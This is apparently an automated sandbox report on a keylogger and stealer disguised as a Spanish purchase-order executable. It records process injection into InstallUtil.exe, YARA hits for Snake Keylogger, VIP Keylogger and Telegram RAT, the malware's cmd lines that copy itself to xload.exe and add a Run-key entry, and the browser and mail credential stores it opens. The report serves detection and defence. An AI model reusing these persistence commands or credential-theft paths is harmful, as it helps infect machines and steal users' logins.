Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: InstallUtil.exe, 00000016.00000002.2612614835.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2610458525.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: InstallUtil.exe, 00000014.00000002.2622090959.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: InstallUtil.exe, 00000014.00000002.2622090959.000000000392B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 20_2_06219548 LdrInitializeThunk,

20_2_06219548

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 62F008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B19008	Jump to behavior

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 18 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 24 > nul && copy "C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe" "C:\Users\user\AppData\Roaming\xload.exe" && ping 127.0.0.1 -n 24 > nul && "C:\Users\user\AppData\Roaming\xload.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\xload.exe "C:\Users\user\AppData\Roaming\xload.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 24 > nul && copy "c:\users\user\desktop\consulta#9978-po24 orden de compra de materiales de muestra_sk.exe" "c:\users\user\appdata\roaming\xload.exe" && ping 127.0.0.1 -n 24 > nul && "c:\users\user\appdata\roaming\xload.exe"
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 24 > nul && copy "c:\users\user\desktop\consulta#9978-po24 orden de compra de materiales de muestra_sk.exe" "c:\users\user\appdata\roaming\xload.exe" && ping 127.0.0.1 -n 24 > nul && "c:\users\user\appdata\roaming\xload.exe"			Jump to behavior

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Queries volume information: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Users\user\AppData\Roaming\xload.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Users\user\AppData\Roaming\xload.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000014.00000002.2614654788.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2614850427.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xload.exe PID: 5800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2036, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xload.exe PID: 5800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2036, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2614654788.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xload.exe PID: 5800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1072, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000014.00000002.2614654788.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2614850427.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556, type: MEMORYSTR
